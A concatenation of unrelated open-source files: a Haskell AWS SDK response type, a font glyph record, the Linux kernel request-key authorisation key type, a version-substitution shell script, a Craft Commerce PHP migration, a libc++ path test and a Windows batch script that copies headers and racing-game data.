  { _dtrsResourceId     :: !(Maybe Text)
  , _dtrsResourceType   :: !(Maybe TaggableResourceType)
  , _dtrsTags           :: !(Maybe [Tag])
  , _dtrsResponseStatus :: !Int
  } deriving (Eq, Read, Show, Data, Typeable, Generic)

-- | Creates a value of 'DescribeTagsResponse' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dtrsResourceId' - The ID of the tagged ML object.
--
-- * 'dtrsResourceType' - The type of the tagged ML object.
--
-- * 'dtrsTags' - A list of tags associated with the ML object.
--
-- * 'dtrsResponseStatus' - The response status code.
describeTagsResponse
  :: Int -- ^ 'dtrsResponseStatus'
  -> DescribeTagsResponse
describeTagsResponse pResponseStatus_ =
  DescribeTagsResponse'
    { _dtrsResourceId = Nothing
    , _dtrsResourceType = Nothing
    , _dtrsTags = Nothing
    , _dtrsResponseStatus = pResponseStatus_
    }

-- | The ID of the tagged ML object.
dtrsResourceId :: Lens' DescribeTagsResponse (Maybe Text)
dtrsResourceId = lens _dtrsResourceId (\ s a -> s{_dtrsResourceId = a})

-- | The type of the tagged ML object.
dtrsResourceType :: Lens' DescribeTagsResponse (Maybe TaggableResourceType)
dtrsResourceType = lens _dtrsResourceType (\ s a -> s{_dtrsResourceType = a})

-- | A list of tags associated with the ML object.
-- Note: '_Default' '.' '_Coerce' hides the Maybe — viewing an absent tag
-- list yields @[]@.
dtrsTags :: Lens' DescribeTagsResponse [Tag]
dtrsTags = lens _dtrsTags (\ s a -> s{_dtrsTags = a}) . _Default . _Coerce

-- | The response status code.
dtrsResponseStatus :: Lens' DescribeTagsResponse Int
dtrsResponseStatus = lens _dtrsResponseStatus (\ s a -> s{_dtrsResponseStatus = a})

instance NFData DescribeTagsResponse where
| {
"pile_set_name": "Github"
} |
StartChar: bar.sups
Encoding: 1114594 -1 1593
Width: 169
VWidth: 440
Flags: HMW
LayerCount: 3
Fore
Refer: 1290 -1 N 1 0 0 1 0 440 2
Validated: 1
Comment: "."
EndChar
| {
"pile_set_name": "Github"
} |
/* Request key authorisation token key definition.
*
* Copyright (C) 2005 Red Hat, Inc. All Rights Reserved.
* Written by David Howells ([email protected])
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
* See Documentation/security/keys-request-key.txt
*/
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/err.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include "internal.h"
#include <keys/user-type.h>
static int request_key_auth_preparse(struct key_preparsed_payload *);
static void request_key_auth_free_preparse(struct key_preparsed_payload *);
static int request_key_auth_instantiate(struct key *,
struct key_preparsed_payload *);
static void request_key_auth_describe(const struct key *, struct seq_file *);
static void request_key_auth_revoke(struct key *);
static void request_key_auth_destroy(struct key *);
static long request_key_auth_read(const struct key *, char __user *, size_t);
/*
 * The request-key authorisation key type definition.
 *
 * Keys of this type carry the credentials and callout data that
 * /sbin/request-key (or another instantiator) needs in order to
 * instantiate a key on behalf of the original requester.
 */
struct key_type key_type_request_key_auth = {
        .name           = ".request_key_auth",
        .def_datalen    = sizeof(struct request_key_auth),
        .preparse       = request_key_auth_preparse,
        .free_preparse  = request_key_auth_free_preparse,
        .instantiate    = request_key_auth_instantiate,
        .describe       = request_key_auth_describe,
        .revoke         = request_key_auth_revoke,
        .destroy        = request_key_auth_destroy,
        .read           = request_key_auth_read,
};
/*
 * Preparse hook — nothing to do: the payload is constructed internally by
 * request_key_auth_new(), never supplied from userspace.
 */
static int request_key_auth_preparse(struct key_preparsed_payload *prep)
{
        return 0;
}
/*
 * Free-preparse hook — nothing to free, matching the no-op preparse above.
 */
static void request_key_auth_free_preparse(struct key_preparsed_payload *prep)
{
}
/*
 * Instantiate a request-key authorisation key.
 *
 * The preparsed data is the struct request_key_auth built by
 * request_key_auth_new(); ownership passes to the key payload here.
 */
static int request_key_auth_instantiate(struct key *key,
                                        struct key_preparsed_payload *prep)
{
        key->payload.data[0] = (struct request_key_auth *)prep->data;
        return 0;
}
/*
 * Describe an authorisation token (e.g. for /proc/keys).
 *
 * Emits "key:<description>" plus, once the key is instantiated, the
 * requesting PID and the length of the callout information.
 */
static void request_key_auth_describe(const struct key *key,
                                      struct seq_file *m)
{
        struct request_key_auth *rka = key->payload.data[0];

        seq_puts(m, "key:");
        seq_puts(m, key->description);
        if (key_is_instantiated(key))
                seq_printf(m, " pid:%d ci:%zu", rka->pid, rka->callout_len);
}
/*
 * Read the callout_info data (retrieves the callout information).
 * - the key's semaphore is read-locked
 *
 * Returns the full callout length even when the copy into the user buffer
 * is truncated to buflen, so the caller can learn the required size;
 * returns -EFAULT if the user buffer cannot be written.
 */
static long request_key_auth_read(const struct key *key,
                                  char __user *buffer, size_t buflen)
{
        struct request_key_auth *rka = key->payload.data[0];
        size_t datalen;
        long ret;

        datalen = rka->callout_len;
        ret = datalen;

        /* we can return the data as is */
        if (buffer && buflen > 0) {
                if (buflen > datalen)
                        buflen = datalen;

                if (copy_to_user(buffer, rka->callout_info, buflen) != 0)
                        ret = -EFAULT;
        }

        return ret;
}
/*
 * Handle revocation of an authorisation token key.
 *
 * Called with the key sem write-locked.  Drops the stashed credentials so
 * they cannot be used after revocation; the remainder of the payload stays
 * around until the key is destroyed.
 */
static void request_key_auth_revoke(struct key *key)
{
        struct request_key_auth *rka = key->payload.data[0];

        kenter("{%d}", key->serial);

        if (rka->cred) {
                put_cred(rka->cred);
                rka->cred = NULL;
        }
}
/*
 * Destroy an instantiation authorisation token key.
 *
 * Releases every reference the payload may still hold: the credentials
 * (if revoke didn't already drop them), the target key, the destination
 * keyring, the callout buffer and the record itself.
 */
static void request_key_auth_destroy(struct key *key)
{
        struct request_key_auth *rka = key->payload.data[0];

        kenter("{%d}", key->serial);

        if (rka->cred) {
                put_cred(rka->cred);
                rka->cred = NULL;
        }

        key_put(rka->target_key);
        key_put(rka->dest_keyring);
        kfree(rka->callout_info);
        kfree(rka);
}
/*
 * Create an authorisation token for /sbin/request-key or whoever to gain
 * access to the caller's security data.
 *
 * On success the returned key is instantiated and linked; on failure an
 * ERR_PTR is returned and every partial allocation has been released.
 */
struct key *request_key_auth_new(struct key *target, const void *callout_info,
                                 size_t callout_len, struct key *dest_keyring)
{
        struct request_key_auth *rka, *irka;
        const struct cred *cred = current->cred;
        struct key *authkey = NULL;
        char desc[20];
        int ret;

        kenter("%d,", target->serial);

        /* allocate an auth record */
        rka = kmalloc(sizeof(*rka), GFP_KERNEL);
        if (!rka) {
                kleave(" = -ENOMEM");
                return ERR_PTR(-ENOMEM);
        }
        rka->callout_info = kmalloc(callout_len, GFP_KERNEL);
        if (!rka->callout_info) {
                kleave(" = -ENOMEM");
                kfree(rka);
                return ERR_PTR(-ENOMEM);
        }

        /* see if the calling process is already servicing the key request of
         * another process */
        if (cred->request_key_auth) {
                /* it is - use that instantiation context here too */
                down_read(&cred->request_key_auth->sem);

                /* if the auth key has been revoked, then the key we're
                 * servicing is already instantiated */
                if (test_bit(KEY_FLAG_REVOKED, &cred->request_key_auth->flags))
                        goto auth_key_revoked;

                /* inherit credentials and the originating PID from the
                 * outer request's auth record */
                irka = cred->request_key_auth->payload.data[0];
                rka->cred = get_cred(irka->cred);
                rka->pid = irka->pid;

                up_read(&cred->request_key_auth->sem);
        }
        else {
                /* it isn't - use this process as the context */
                rka->cred = get_cred(cred);
                rka->pid = current->pid;
        }

        rka->target_key = key_get(target);
        rka->dest_keyring = key_get(dest_keyring);
        memcpy(rka->callout_info, callout_info, callout_len);
        rka->callout_len = callout_len;

        /* allocate the auth key; its description is the target key's serial
         * number rendered in hex (desc[20] comfortably fits 8 hex digits) */
        sprintf(desc, "%x", target->serial);

        authkey = key_alloc(&key_type_request_key_auth, desc,
                            cred->fsuid, cred->fsgid, cred,
                            KEY_POS_VIEW | KEY_POS_READ | KEY_POS_SEARCH |
                            KEY_USR_VIEW, KEY_ALLOC_NOT_IN_QUOTA, NULL);
        if (IS_ERR(authkey)) {
                ret = PTR_ERR(authkey);
                goto error_alloc;
        }

        /* construct the auth key; ownership of rka passes to the key's
         * payload via request_key_auth_instantiate() */
        ret = key_instantiate_and_link(authkey, rka, 0, NULL, NULL);
        if (ret < 0)
                goto error_inst;

        kleave(" = {%d,%d}", authkey->serial, atomic_read(&authkey->usage));
        return authkey;

auth_key_revoked:
        /* reached before rka->cred / target_key / dest_keyring were taken,
         * so only the buffers themselves need freeing */
        up_read(&cred->request_key_auth->sem);
        kfree(rka->callout_info);
        kfree(rka);
        kleave("= -EKEYREVOKED");
        return ERR_PTR(-EKEYREVOKED);

error_inst:
        key_revoke(authkey);
        key_put(authkey);
error_alloc:
        key_put(rka->target_key);
        key_put(rka->dest_keyring);
        kfree(rka->callout_info);
        kfree(rka);
        kleave("= %d", ret);
        return ERR_PTR(ret);
}
/*
 * Search the current process's keyrings for the authorisation key for
 * instantiation of a key.
 *
 * Returns the auth key (with a reference held) or an ERR_PTR: -ENOKEY if
 * no matching key exists, -EKEYREVOKED if it was found but revoked.
 */
struct key *key_get_instantiation_authkey(key_serial_t target_id)
{
        char description[16];
        struct keyring_search_context ctx = {
                .index_key.type         = &key_type_request_key_auth,
                .index_key.description  = description,
                .cred                   = current_cred(),
                .match_data.cmp         = key_default_cmp,
                .match_data.raw_data    = description,
                .match_data.lookup_type = KEYRING_SEARCH_LOOKUP_DIRECT,
                .flags                  = KEYRING_SEARCH_DO_STATE_CHECK,
        };
        struct key *authkey;
        key_ref_t authkey_ref;

        /* auth keys are described by the target key's serial in hex —
         * mirrors the sprintf in request_key_auth_new() */
        sprintf(description, "%x", target_id);

        authkey_ref = search_process_keyrings(&ctx);

        if (IS_ERR(authkey_ref)) {
                authkey = ERR_CAST(authkey_ref);
                /* -EAGAIN just means "nothing found"; report it as -ENOKEY */
                if (authkey == ERR_PTR(-EAGAIN))
                        authkey = ERR_PTR(-ENOKEY);
                goto error;
        }

        authkey = key_ref_to_ptr(authkey_ref);
        if (test_bit(KEY_FLAG_REVOKED, &authkey->flags)) {
                key_put(authkey);
                authkey = ERR_PTR(-EKEYREVOKED);
        }

error:
        return authkey;
}
| {
"pile_set_name": "Github"
} |
# Generate ../library/<pkg>/DESCRIPTION from DESCRIPTION.in for each package
# named on the command line, substituting @VERSION@ with "<major>.<minor>".
# ../../VERSION is expected to look like: "<major>.<minor> <revision>".
maj=`sed 's/\([^ .]*\)\.\([^ ]*\) *\(.*\)/\1/' < ../../VERSION`
min=`sed 's/\([^ .]*\)\.\([^ ]*\) *\(.*\)/\2/' < ../../VERSION`
# Revision component; extracted for completeness but not substituted here.
rev=`sed 's/\([^ .]*\)\.\([^ ]*\) *\(.*\)/\3/' < ../../VERSION`

# "$@" (not $*) and quoted paths keep package names intact even if a name
# ever contains whitespace; the sed expression is quoted for the same reason.
for d in "$@"; do
    sed -e "s/@VERSION@/$maj.$min/" "../library/$d/DESCRIPTION.in" > "../library/$d/DESCRIPTION"
done
| {
"pile_set_name": "Github"
} |
<?php
/**
* @link https://craftcms.com/
* @copyright Copyright (c) Pixel & Tonic, Inc.
* @license https://craftcms.github.io/license/
*/
namespace craft\commerce\migrations;
use Craft;
use craft\commerce\fields\Products;
use craft\db\Migration;
use craft\db\Query;
use craft\helpers\Json;
/**
 * m180319_130001_fieldSettings migration.
 *
 * Rewrites the stored settings of all Commerce Products fields: folds the
 * per-field translation method into a `localizeRelations` flag and maps the
 * legacy `targetLocale` site handle to a `targetSiteId`.
 */
class m180319_130001_fieldSettings extends Migration
{
    /**
     * @inheritdoc
     */
    public function safeUp()
    {
        // Only Products relation fields are affected; everything else is
        // left untouched.
        $fields = (new Query())
            ->select(['id', 'type', 'translationMethod', 'settings'])
            ->from(['{{%fields}}'])
            ->where([
                'type' => [
                    Products::class,
                ]
            ])
            ->all($this->db);

        foreach ($fields as $field) {
            $settings = Json::decodeIfJson($field['settings']);

            if (!is_array($settings)) {
                // Guard against a settings column holding invalid JSON or a
                // scalar; without this reset the array assignments below
                // would fail with "Cannot use a scalar value as an array".
                echo 'Field ' . $field['id'] . ' (' . $field['type'] . ') settings were invalid JSON: ' . $field['settings'] . "\n";
                $settings = [];
            }

            // A "site" translation method becomes the localizeRelations flag.
            $localized = ($field['translationMethod'] === 'site');
            $settings['localizeRelations'] = $localized;

            // targetLocale (a site handle) => targetSiteId; fall back to the
            // primary site when the handle no longer resolves.
            if (!empty($settings['targetLocale'])) {
                $site = Craft::$app->getSites()->getSiteByHandle($settings['targetLocale']);
                if ($site) {
                    $settings['targetSiteId'] = $site->id;
                } else {
                    $settings['targetSiteId'] = Craft::$app->getSites()->getPrimarySite()->id;
                }
            }
            unset($settings['targetLocale']);

            // Write back; the trailing `false` suppresses timestamp updates.
            $this->update(
                '{{%fields}}',
                [
                    'translationMethod' => 'none',
                    'settings' => Json::encode($settings),
                ],
                ['id' => $field['id']],
                [],
                false);
        }

        return true;
    }

    /**
     * @inheritdoc
     */
    public function safeDown()
    {
        // The original per-field translation methods are discarded in
        // safeUp(), so this migration cannot be reverted.
        echo "m180319_130001_fieldSettings cannot be reverted.\n";
        return false;
    }
}
| {
"pile_set_name": "Github"
} |
//===----------------------------------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
// UNSUPPORTED: c++98, c++03
// <filesystem>
// class path
// path& replace_filename()
#include "filesystem_include.h"
#include <type_traits>
#include <cassert>
#include "test_macros.h"
#include "test_iterators.h"
#include "count_new.h"
#include "filesystem_test_helper.h"
#include "assert_checkpoint.h"
#include "verbose_assert.h"
// One row of the replace_filename() test matrix.
struct ReplaceFilenameTestcase {
  const char* value;    // starting path
  const char* expect;   // expected path after replace_filename(filename)
  const char* filename; // replacement filename (may be empty)
};

// Cases cover the root path, repeated separators, trailing separators,
// "." / ".." filenames, and backslashes (which, per the expectations below,
// are ordinary filename characters rather than separators here).
const ReplaceFilenameTestcase TestCases[] =
  {
    {"/foo", "/bar", "bar"}
  , {"/foo", "/", ""}
  , {"foo", "bar", "bar"}
  , {"/", "/bar", "bar"}
  , {"\\", "bar", "bar"}
  , {"///", "///bar", "bar"}
  , {"\\\\", "bar", "bar"}
  , {"\\/\\", "\\/bar", "bar"}
  , {".", "bar", "bar"}
  , {"..", "bar", "bar"}
  , {"/foo\\baz/bong/", "/foo\\baz/bong/bar", "bar"}
  , {"/foo\\baz/bong", "/foo\\baz/bar", "bar"}
  };
// Drives every test case: checks the resulting path value, that the method
// returns *this, and that the effect matches the standard's "as-if"
// specification (remove_filename() followed by appending the new filename).
int main(int, char**)
{
  using namespace fs;
  for (auto const & TC : TestCases) {
    path p(TC.value);
    ASSERT_EQ(p, TC.value);
    // replace_filename() must return a reference to the same object.
    path& Ref = (p.replace_filename(TC.filename));
    ASSERT_EQ(p, TC.expect)
        << DISPLAY(TC.value)
        << DISPLAY(TC.filename);
    assert(&Ref == &p);
    // Tests Effects "as-if": remove_filename() append(filename)
    {
      path p2(TC.value);
      path replace(TC.filename);
      p2.remove_filename();
      p2 /= replace;
      ASSERT_EQ(p, p2);
    }
  }

  return 0;
}
| {
"pile_set_name": "Github"
} |
@echo off
rem Generic export/runtime install script. Expects the runtime target
rem directory name as the first argument (%1); refuses to run without it.
set RUNTIMEDIR=%1
if defined RUNTIMEDIR goto build
echo Parameter missing, please do not execute generic scripts directly
exit /b
:build
rem Create the export tree for headers and (release/debug) libraries.
call .\create_dir .\export
call .\create_dir .\export\lib
call .\create_dir .\export\libd
rem Export public headers to .\export\include, grouped per source module.
rem Each copy is guarded by "if exist" so the generic script also works in
rem partial source trees; create_dir is called once per path level.
rem -- interfaces --
if exist .\src\interfaces\*.* call .\create_dir .\export
if exist .\src\interfaces\*.* call .\create_dir .\export\include
if exist .\src\interfaces\car.h copy .\src\interfaces\car.h .\export\include\car.h
if exist .\src\interfaces\graphic.h copy .\src\interfaces\graphic.h .\export\include\graphic.h
if exist .\src\interfaces\js.h copy .\src\interfaces\js.h .\export\include\js.h
if exist .\src\interfaces\playerpref.h copy .\src\interfaces\playerpref.h .\export\include\playerpref.h
if exist .\src\interfaces\raceman.h copy .\src\interfaces\raceman.h .\export\include\raceman.h
if exist .\src\interfaces\replay.h copy .\src\interfaces\replay.h .\export\include\replay.h
if exist .\src\interfaces\robot.h copy .\src\interfaces\robot.h .\export\include\robot.h
if exist .\src\interfaces\simu.h copy .\src\interfaces\simu.h .\export\include\simu.h
if exist .\src\interfaces\telemetry.h copy .\src\interfaces\telemetry.h .\export\include\telemetry.h
if exist .\src\interfaces\track.h copy .\src\interfaces\track.h .\export\include\track.h
rem -- libs: txml, tgf, tgfclient --
if exist .\src\libs\txml\*.* call .\create_dir .\export
if exist .\src\libs\txml\*.* call .\create_dir .\export\include
if exist .\src\libs\txml\xml.h copy .\src\libs\txml\xml.h .\export\include\xml.h
if exist .\src\libs\txml\xmlparse.h copy .\src\libs\txml\xmlparse.h .\export\include\xmlparse.h
if exist .\src\libs\tgf\*.* call .\create_dir .\export
if exist .\src\libs\tgf\*.* call .\create_dir .\export\include
if exist .\src\libs\tgf\tgf.h copy .\src\libs\tgf\tgf.h .\export\include\tgf.h
if exist .\src\libs\tgf\os.h copy .\src\libs\tgf\os.h .\export\include\os.h
if exist .\src\libs\tgfclient\*.* call .\create_dir .\export
if exist .\src\libs\tgfclient\*.* call .\create_dir .\export\include
if exist .\src\libs\tgfclient\tgfclient.h copy .\src\libs\tgfclient\tgfclient.h .\export\include\tgfclient.h
if exist .\src\libs\tgfclient\screen_properties.h copy .\src\libs\tgfclient\screen_properties.h .\export\include\screen_properties.h
if exist .\src\libs\tgfclient\glfeatures.h copy .\src\libs\tgfclient\glfeatures.h .\export\include\glfeatures.h
rem -- libs: client, confscreens, racescreens, robottools, raceengineclient --
if exist .\src\libs\client\*.* call .\create_dir .\export
if exist .\src\libs\client\*.* call .\create_dir .\export\include
if exist .\src\libs\client\client.h copy .\src\libs\client\client.h .\export\include\client.h
if exist .\src\libs\client\exitmenu.h copy .\src\libs\client\exitmenu.h .\export\include\exitmenu.h
if exist .\src\libs\confscreens\*.* call .\create_dir .\export
if exist .\src\libs\confscreens\*.* call .\create_dir .\export\include
if exist .\src\libs\confscreens\confscreens.h copy .\src\libs\confscreens\confscreens.h .\export\include\confscreens.h
if exist .\src\libs\confscreens\driverconfig.h copy .\src\libs\confscreens\driverconfig.h .\export\include\driverconfig.h
if exist .\src\libs\confscreens\joystickconfig.h copy .\src\libs\confscreens\joystickconfig.h .\export\include\joystickconfig.h
if exist .\src\libs\confscreens\mouseconfig.h copy .\src\libs\confscreens\mouseconfig.h .\export\include\mouseconfig.h
if exist .\src\libs\confscreens\controlconfig.h copy .\src\libs\confscreens\controlconfig.h .\export\include\controlconfig.h
if exist .\src\libs\confscreens\graphconfig.h copy .\src\libs\confscreens\graphconfig.h .\export\include\graphconfig.h
if exist .\src\libs\confscreens\soundconfig.h copy .\src\libs\confscreens\soundconfig.h .\export\include\soundconfig.h
if exist .\src\libs\confscreens\simuconfig.h copy .\src\libs\confscreens\simuconfig.h .\export\include\simuconfig.h
if exist .\src\libs\confscreens\openglconfig.h copy .\src\libs\confscreens\openglconfig.h .\export\include\openglconfig.h
if exist .\src\libs\racescreens\*.* call .\create_dir .\export
if exist .\src\libs\racescreens\*.* call .\create_dir .\export\include
if exist .\src\libs\racescreens\racescreens.h copy .\src\libs\racescreens\racescreens.h .\export\include\racescreens.h
if exist .\src\libs\robottools\*.* call .\create_dir .\export
if exist .\src\libs\robottools\*.* call .\create_dir .\export\include
if exist .\src\libs\robottools\robottools.h copy .\src\libs\robottools\robottools.h .\export\include\robottools.h
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\export
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\export\include
if exist .\src\libs\raceengineclient\singleplayer.h copy .\src\libs\raceengineclient\singleplayer.h .\export\include\singleplayer.h
if exist .\src\libs\raceengineclient\raceinit.h copy .\src\libs\raceengineclient\raceinit.h .\export\include\raceinit.h
rem -- OS-specific header --
rem NOTE(review): the existence checks probe src\linux but the copy takes
rem src\windows\osspec.h — presumably intentional for the Windows build of
rem this generic script; confirm against the Linux variant.
if exist .\src\linux\*.* call .\create_dir .\export
if exist .\src\linux\*.* call .\create_dir .\export\include
if exist .\src\windows\osspec.h copy .\src\windows\osspec.h .\export\include\osspec.h
rem -- SOLID collision library headers (3D math + public API) --
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\*.* call .\create_dir .\export
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\*.* call .\create_dir .\export\include
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\*.* call .\create_dir .\export\include\3D
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Basic.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Basic.h .\export\include\3D\Basic.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Matrix.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Matrix.h .\export\include\3D\Matrix.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Point.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Point.h .\export\include\3D\Point.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Quaternion.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Quaternion.h .\export\include\3D\Quaternion.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple3.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple3.h .\export\include\3D\Tuple3.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple4.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple4.h .\export\include\3D\Tuple4.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Vector.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Vector.h .\export\include\3D\Vector.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\*.* call .\create_dir .\export
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\*.* call .\create_dir .\export\include
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\*.* call .\create_dir .\export\include\SOLID
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\solid.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\solid.h .\export\include\SOLID\solid.h
rem -- template math headers (exported under include\tmath) --
if exist .\src\libs\math\*.* call .\create_dir .\export
if exist .\src\libs\math\*.* call .\create_dir .\export\include
if exist .\src\libs\math\*.* call .\create_dir .\export\include\tmath
if exist .\src\libs\math\linalg_t.h copy .\src\libs\math\linalg_t.h .\export\include\tmath\linalg_t.h
if exist .\src\libs\math\straight2_t.h copy .\src\libs\math\straight2_t.h .\export\include\tmath\straight2_t.h
if exist .\src\libs\math\v4_t.h copy .\src\libs\math\v4_t.h .\export\include\tmath\v4_t.h
if exist .\src\libs\math\v3_t.h copy .\src\libs\math\v3_t.h .\export\include\tmath\v3_t.h
if exist .\src\libs\math\v2_t.h copy .\src\libs\math\v2_t.h .\export\include\tmath\v2_t.h
rem -- learning library headers --
if exist .\src\libs\learning\*.* call .\create_dir .\export
if exist .\src\libs\learning\*.* call .\create_dir .\export\include
if exist .\src\libs\learning\*.* call .\create_dir .\export\include\learning
if exist .\src\libs\learning\policy.h copy .\src\libs\learning\policy.h .\export\include\learning\policy.h
if exist .\src\libs\learning\ann_policy.h copy .\src\libs\learning\ann_policy.h .\export\include\learning\ann_policy.h
if exist .\src\libs\learning\ANN.h copy .\src\libs\learning\ANN.h .\export\include\learning\ANN.h
if exist .\src\libs\learning\learn_debug.h copy .\src\libs\learning\learn_debug.h .\export\include\learning\learn_debug.h
if exist .\src\libs\learning\real.h copy .\src\libs\learning\real.h .\export\include\learning\real.h
if exist .\src\libs\learning\string_utils.h copy .\src\libs\learning\string_utils.h .\export\include\learning\string_utils.h
if exist .\src\libs\learning\List.h copy .\src\libs\learning\List.h .\export\include\learning\List.h
if exist .\src\libs\learning\MathFunctions.h copy .\src\libs\learning\MathFunctions.h .\export\include\learning\MathFunctions.h
if exist .\src\libs\learning\Distribution.h copy .\src\libs\learning\Distribution.h .\export\include\learning\Distribution.h
rem if exist .\src\libs\learning\SmartAssert.h copy .\src\libs\learning\SmartAssert.h .\export\include\learning\SmartAssert.h
rem -- musicplayer and portability headers --
if exist .\src\libs\musicplayer\*.* call .\create_dir .\export
if exist .\src\libs\musicplayer\*.* call .\create_dir .\export\include
if exist .\src\libs\musicplayer\*.* call .\create_dir .\export\include\musicplayer
if exist .\src\libs\musicplayer\musicplayer.h copy .\src\libs\musicplayer\musicplayer.h .\export\include\musicplayer\musicplayer.h
if exist .\src\libs\musicplayer\OggSoundStream.h copy .\src\libs\musicplayer\OggSoundStream.h .\export\include\musicplayer\OggSoundStream.h
if exist .\src\libs\musicplayer\OpenALMusicPlayer.h copy .\src\libs\musicplayer\OpenALMusicPlayer.h .\export\include\musicplayer\OpenALMusicPlayer.h
if exist .\src\libs\musicplayer\SoundStream.h copy .\src\libs\musicplayer\SoundStream.h .\export\include\musicplayer\SoundStream.h
if exist .\src\libs\portability\*.* call .\create_dir .\export
if exist .\src\libs\portability\*.* call .\create_dir .\export\include
if exist .\src\libs\portability\portability.h copy .\src\libs\portability\portability.h .\export\include\portability.h
rem Install the berniw robot runtime data (car skins and setup files)
rem into %RUNTIMEDIR%\drivers\berniw\<n>. create_dir is called once per
rem path level; copies are guarded so partial trees still work.
rem FIX: removed the redundant duplicated copies of car3-trb1.rgb (berniw\5)
rem and car4-trb1.rgb (berniw\6) present in the original script.
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\1
if exist .\src\drivers\berniw\1\car1-stock1.rgb copy .\src\drivers\berniw\1\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\berniw\1\car1-stock1.rgb
if exist .\src\drivers\berniw\1\default.xml copy .\src\drivers\berniw\1\default.xml .\%RUNTIMEDIR%\drivers\berniw\1\default.xml
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\10
if exist .\src\drivers\berniw\10\car1-trb3.rgb copy .\src\drivers\berniw\10\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\berniw\10\car1-trb3.rgb
if exist .\src\drivers\berniw\10\default.xml copy .\src\drivers\berniw\10\default.xml .\%RUNTIMEDIR%\drivers\berniw\10\default.xml
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\2
if exist .\src\drivers\berniw\2\car1-stock1.rgb copy .\src\drivers\berniw\2\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\berniw\2\car1-stock1.rgb
if exist .\src\drivers\berniw\2\default.xml copy .\src\drivers\berniw\2\default.xml .\%RUNTIMEDIR%\drivers\berniw\2\default.xml
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\3
if exist .\src\drivers\berniw\3\default.xml copy .\src\drivers\berniw\3\default.xml .\%RUNTIMEDIR%\drivers\berniw\3\default.xml
if exist .\src\drivers\berniw\3\car1-trb1.rgb copy .\src\drivers\berniw\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\3\car1-trb1.rgb
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\4
if exist .\src\drivers\berniw\4\default.xml copy .\src\drivers\berniw\4\default.xml .\%RUNTIMEDIR%\drivers\berniw\4\default.xml
if exist .\src\drivers\berniw\4\car2-trb1.rgb copy .\src\drivers\berniw\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\4\car2-trb1.rgb
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\5
